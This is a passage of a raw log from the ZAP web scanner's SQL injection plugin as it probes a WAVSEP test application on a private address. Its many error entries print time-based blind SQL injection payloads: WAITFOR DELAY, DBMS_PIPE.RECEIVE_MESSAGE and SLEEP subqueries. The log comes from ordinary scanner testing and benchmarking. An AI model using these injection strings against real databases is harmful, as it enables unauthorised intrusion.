CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679293 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(113)||CHR(99)||CHR(99),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(113)||CHR(99)||CHR(99),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679294 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679294 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(85)||CHR(98)||CHR(106),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(85)||CHR(98)||CHR(106),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679295 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679296 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(85)||CHR(73)||CHR(120),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(85)||CHR(73)||CHR(120),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679297 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(78)||CHR(111)||CHR(113),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(78)||CHR(111)||CHR(113),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679297 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679298 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(65)||CHR(88)||CHR(86),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(65)||CHR(88)||CHR(86),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679298 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(113)||CHR(112)||CHR(76),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(113)||CHR(112)||CHR(76),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679299 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(111)||CHR(121)||CHR(119),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(111)||CHR(121)||CHR(119),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679300 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND (SELECT * FROM (SELECT(SLEEP(5)))nckQ) AND (4322=4322] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND (SELECT * FROM (SELECT(SLEEP(5)))nckQ) AND (4322=4322 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679301 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND (SELECT * FROM (SELECT(SLEEP(5)))DrdC)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND (SELECT * FROM (SELECT(SLEEP(5)))DrdC) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679301 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload 